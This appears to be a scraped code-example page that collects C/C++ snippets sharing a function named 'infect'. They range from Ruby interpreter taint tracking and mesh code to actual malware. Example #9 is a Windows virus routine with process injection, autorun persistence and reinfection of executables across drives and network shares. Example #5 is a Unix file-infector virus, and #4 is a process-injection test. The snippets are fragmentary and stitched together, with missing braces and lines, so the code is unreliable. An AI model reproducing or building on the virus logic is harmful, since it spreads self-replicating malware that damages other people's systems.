예제 #1
 // Rubinius.primitive :string_dup
 String* string_dup(STATE) {
   if(likely(klass() == G(string) && ivars()->nil_p())) {
     /* We have a plain string with no metaclass or ivars, so if we can
      * allocate a new object in the young space, we can copy it directly
      * without needing a write barrier.
     String* so = state->memory()->new_object<String>(state, G(string));
     if(likely(so->young_object_p())) {
       so->copy_body(state->vm(), this);
       so->shared(state, cTrue);
       shared(state, cTrue);
       infect(state, so);
       return so;
   return string_dup_slow(state);
예제 #2
파일: float.cpp 프로젝트: v-dorosh/rubinius
String* Float::to_s_formatted(STATE, String* format) {
    char buf[FLOAT_TO_S_STRLEN];

    size_t size = snprintf(buf, FLOAT_TO_S_STRLEN, format->c_str(state), val);

    if(size >= FLOAT_TO_S_STRLEN) {
        std::ostringstream msg;
        msg << "formatted string exceeds " << FLOAT_TO_S_STRLEN << " bytes";
        Exception::argument_error(state, msg.str().c_str());
    String* str = String::create(state, buf, size);
    infect(state, str);
    str->encoding(state, Encoding::usascii_encoding(state));
    str->ascii_only(state, cTrue);
    str->valid_encoding(state, cTrue);
    return str;
예제 #3
void *perform_work(void *argument) {
  int passed_in_value, i=0x11, j=33;
  int *seeds, nSeeds;
  passed_in_value = *((int *) argument);
  seeds = malloc( 1*sizeof *seeds);
  nSeeds = 1;

  seeds[0] = seed_vertices[0];

   * Record whether a vertex is infected
  char *infected ;
  int s =  (G->V + 5) * sizeof *infected;
  infected= malloc(s);
  memset(infected, 0,s);
  unsigned long seed_int = (unsigned long) (
      (1 + passed_in_value + time(NULL)) % 888);
#ifdef __CYGWIN__
  reent seed = (reent) seed_int;
  struct drand48_data seed;
  srand48_r(seed_int, &seed);
  for (i = 1, j = 1; i <= G->V; ++i) {
    if (i != seeds[0] &&
        getRandTo_r(MAX_EDGE_WEIGHT, &seed) <= G->adj_list[i]->prob) {
      if(j >= nSeeds){
        seeds= realloc(seeds, (1+j)*2*sizeof *seeds);
        nSeeds = 2+j*2;
      seeds[j] = i;
  n_seed = j ;
  Ninfected_ptr[passed_in_value] =
      infect(G,n_seed , seeds, infected, &seed);

  fprintf(out2, "infected[%d] : %d\n", passed_in_value,

  return NULL;
예제 #4
int main() {
  char *argv[] = {"/bin/sleep", "30", NULL};
  char *envp[] = {NULL};
  thread_act_t thread;
  mach_port_t port = MACH_PORT_NULL;
  pid_t pid = spawn("/bin/sleep", argv, envp, &port, -1);
  if (pid <= 0 && port == MACH_PORT_NULL) {
    return 1;
  /* No rush, let's assume 2 seconds is enough time to get our
   * process properly bootstrapped (execve, dyld, etc.
  if (!infect(port, dummy_bundle, dummy_bundle_len, &thread)) {
    printf("FAILED TO INFECT!\n");
    return 1;
  printf("Check if /tmp/dummy.bundle.out exists!\n");
  return 0;
예제 #5
파일: vlp1.c 프로젝트: ahvonenj/viruses
int main(int argc, char **argv, char **envp)
   	char *s, *s2, *path, *dir;
        int i;
        char from[200];        
#ifdef DEBUG
       /* If U are angry do this:
        * setenv("PATH", "/root/VTEST/bin:/root/VTEST/bad:/root/VTEST/usr/bin:/root/VTEST/bad2", 1);
        fd = fopen(TRACEFILE, "a");
        DFPRINTF("====== tracefile of stealthf0rk's VLP ==========\n");
        path = getenv("PATH");
        s = whereis(path, argv[0]);  /* return only static! -> */
        if (strcpy(from, s) == NULL) /* so we need a copy */
           	return -1;
        DFPRINTF("@f main: file of action is <%s>\n", from);
        i = infect(3, from);
        exechost(from, argv, envp);
        return 0;
예제 #6
    // This customized version carves holes defined by the regions.
    // It'll remove any element which doesn't receive any region.
    int custom_carveholes(struct mesh *m, struct behavior *b, const int *outside, const int *inside)
        struct otri neighbortri;
        struct otri triangleloop;
        struct osub subsegloop;
        triangle **temptri;
        triangle ptr;                     /* Temporary variable used by sym(). */
        double area;
        double attribute;
        double triangle_attribute;
        int sane_mesh;

        poolinit(& m->viri, sizeof( triangle * ), VIRUSPERBLOCK, VIRUSPERBLOCK, 0);

        /* Assigns every triangle a regional attribute of -1 */
        traversalinit(& m->triangles);
        triangleloop.orient = 0;
        triangleloop.tri = triangletraverse(m);
        while ( triangleloop.tri != ( triangle * ) NULL ) {
            setelemattribute(triangleloop, m->eextras, -1.0);
            triangleloop.tri = triangletraverse(m);

        sane_mesh = 1;

        /* Loop over all segments */
        traversalinit(& m->subsegs);
        subsegloop.ss = subsegtraverse(m);
        subsegloop.ssorient = 0;
        while ( subsegloop.ss != ( subseg * ) NULL ) {
            if ( subsegloop.ss != m->dummysub ) {
                /* First neighbor. */
                stpivot(subsegloop, neighbortri);
                if ( neighbortri.tri != m->dummytri ) {
                    area = 0.0; /// @todo Possible set this as the minimum as well.
                    attribute = outside [ mark(subsegloop) - 1 ];
                    triangle_attribute = elemattribute(neighbortri, m->eextras);

                    /* The region no number yet. */
                    if ( triangle_attribute < 0 && attribute >= 0 ) {
                        temptri = ( triangle ** ) poolalloc(& m->viri);
                        * temptri = neighbortri.tri;
                        /* Apply one region's attribute and/or area constraint. */
                        regionplague(m, b, attribute, area);
                        /* The virus pool should be empty now. */
                    } else if ( attribute >= 0 && triangle_attribute >= 0 && attribute != triangle_attribute ) {
                        /* Check for problems. */
                        vertex v1, v2, v3;
                        org(neighbortri, v1);
                        dest(neighbortri, v2);
                        apex(neighbortri, v3);
                        fprintf(stdout, "Error: inconsistent region information (new %d, old %d from %d) (outside) at (%e, %e)\n",
                                ( int ) attribute, ( int ) triangle_attribute, ( int ) mark(subsegloop), ( v1 [ 0 ] + v2 [ 0 ] + v3 [ 0 ] ) / 3, ( v1 [ 1 ] + v2 [ 1 ] + v3 [ 1 ] ) / 3);
                        sane_mesh = 0;

                /* Second neighbor (same procedure). */
                stpivot(subsegloop, neighbortri);
                if ( neighbortri.tri != m->dummytri ) {
                    area = 0.0;
                    attribute = inside [ mark(subsegloop) - 1 ];
                    triangle_attribute = elemattribute(neighbortri, m->eextras);

                    if ( triangle_attribute < 0 && attribute >= 0 ) {
                        temptri = ( triangle ** ) poolalloc(& m->viri);
                        * temptri = neighbortri.tri;
                        regionplague(m, b, attribute, area);
                    } else if ( attribute >= 0 && triangle_attribute >= 0 && attribute != triangle_attribute ) {
                        vertex v1, v2, v3;
                        org(neighbortri, v1);
                        dest(neighbortri, v2);
                        apex(neighbortri, v3);
                        fprintf(stdout, "Error: inconsistent region information (new %d, old %d from %d) (inside) at (%e, %e)\n",
                                ( int ) attribute, ( int ) triangle_attribute, ( int ) mark(subsegloop), ( v1 [ 0 ] + v2 [ 0 ] + v3 [ 0 ] ) / 3, ( v1 [ 1 ] + v2 [ 1 ] + v3 [ 1 ] ) / 3);
                        sane_mesh = 0;

                subsegloop.ss = subsegtraverse(m);

        /* Remove all triangles with marker 0.0 */
        traversalinit(& m->triangles);
        triangleloop.tri = triangletraverse(m);
        int triangle_number = 0;
        while ( triangleloop.tri != ( triangle * ) NULL ) {
            if ( triangleloop.tri != m->dummytri ) {
                attribute = elemattribute(triangleloop, m->eextras);
                if ( attribute == -1.0 ) {
                    fprintf(stderr, "Broken mesh at triangle %d\n", triangle_number);
                    sane_mesh = 0;
                } else if ( attribute == 0.0 ) {
                    temptri = ( triangle ** ) poolalloc(& m->viri);
                    * temptri = triangleloop.tri;
            triangleloop.tri = triangletraverse(m);
        /* Remove the marked elements */
        plague(m, b);

        if ( b->regionattrib && !b->refine ) {
            /* Note the fact that each triangle has an additional attribute. */

        /* Free up memory. */
        pooldeinit(& m->viri);

        return sane_mesh;
예제 #7
파일: virus.c 프로젝트: N0rp/Security
int main(int argc, char ** argv){
	infect(argc, argv);
예제 #8
int main(int argc, char **argv)
    char *field;
    char *ampptr;
    char *query;
    char *token;
    int status;
    char defaultcnffile[] = "infect.cnf";
    char *cnffile, *paramsfile;
    CONF_CTX *cnfctx;
    char *unencfile;
    char *email, *subject;
    char *id;

    if (argc < 2) {
	printf("Usage: infect id=<email address>\n");
	return 0;
    if (argc > 2) {
	cnffile = argv[1];
	query = argv[2];
    } else {
	cnffile = defaultcnffile;
	query = argv[1];

    cnfctx = LoadConfig(cnffile);

    if (!cnfctx) {
	fprintf(stderr, "error opening %s\n", cnffile);
	fprintf(stderr, "using default values\n");
	cnfctx = constructCTX();

    paramsfile = GetPathParam(cnfctx, "params", 0, "params.txt");
    mailprog = GetPathParam(cnfctx, "mail", 0, "/usr/bin/mail");
    encfile = GetPathParam(cnfctx, "messagefile", 0, "firstmessage.txt");
    unencfile = GetPathParam(cnfctx, "helpfile", 0, "instructions.txt");

    printf("Infecting %s\n", query);
    cout << "params file: " << paramsfile << endl;
    cout << "mailer: " << mailprog << endl;
    cout << "instructions: " << unencfile << endl;
    cout << "message: " << encfile << endl;

    status = FMT_load_raw_byte_string(plainmessage, unencfile);
    if (status != 1) {
	fprintf(stderr, "error opening instructions\n");

    status = FMT_load_params(params, paramsfile);
    if (status != 1) {
	fprintf(stderr, "Error loading params file %s\n", paramsfile);

    email = NULL;
    subject = NULL;

    token = (char *) malloc(strlen(query) + 1);

    ampptr = query;
    ampptr = get_token(token, ampptr, '&');
    while(ampptr) {
	if (!(field = index(token, '='))) {
	    fprintf(stderr, "Malformed query\n");
	    return 1;
	field[0] = 0;
	if (!strcmp(token, "id")) {
	    email = (char *) malloc(strlen(field));
	    strcpy(email, field);
	} else if (!strcmp(token, "subject")) {
	    subject = (char *) malloc(strlen(field));
	    strcpy(subject, field);
	ampptr = get_token(token, ampptr, '&');

    if (!email) {
	//char errmsg[] = "Must supply email address and password.";
	fprintf(stderr, "bad ID\n");
	return 1;
    id = FMT_make_id(email, subject, params);
    infect(email, id);



    return 0;
예제 #9
파일: main.cpp 프로젝트: 0x37N0w4N/malware
void entry(DWORD magic,DECRYPT_ITEM *item){	
	if (magic==MAGIC_INJECT){
#if _DEBUG
		wchar_t name[MAX_PATH];
		GetModuleFileNameW(GetModuleHandleW(0), name, MAX_PATH);
		dbg(VINFO, L"I'm injected %s",name);
		//в ожидании что бот помер
		while (true){
			HANDLE hbot = CreateMutexA(0, TRUE, mtbot);
			if (!hbot){
			if (GetLastError() == ERROR_ALREADY_EXISTS){
		//основной цикл жизни бота
#if _DEBUG
		dbg(VINFO, L"Run bot %s", name);
		//старт полезной нагрузки
		CreateThread(0, 0, thread_payload, 0, 0, 0);
		//запись в автозапуск
		CreateThread(0, 0, thread_autorun, item, 0, 0);
		//повторный инфект
		cmem b;
		b.push(item+1, item->size);
		while (1){
			find_drive(L"*.exe", P, &b);
			find_drive(L"*.dll", P, &b);
			infect_netshares(shares, &b);
			find_drive(L"*.*", P, &b);
			dbg(VINFO, "Infect done");
	if (magic == MAGIC_SHELLCODE){ //Второе поколение вируса
		dbg(VINFO, L"I'm copy beetle2 inside target file");
		setPrivilege(GetCurrentProcess(), SE_DEBUG_NAME, TRUE);
		cmem inj;
		inj.push(item, item->size + sizeof(DECRYPT_ITEM));

	wchar_t fcur[MAX_PATH];
	GetModuleFileNameW(GetModuleHandleW(0), fcur, MAX_PATH);

	cmem a, b, c;
	if (!cfile::load(fcur, a)){
		dbg(VERROR, "Can't open current file");
	if (!cfile::load("..\\test\\notepad.exe", b)){
		dbg(VERROR, "Can't open target file");
	if (!infect(b, a, &c)){
		dbg(VERROR, "Can't infect target file");

	if (!cfile::save("..\\test\\notepad.inf.exe", c)){
		dbg(VERROR, "Can't save infected file");

	dbg(VINFO, "Done target file");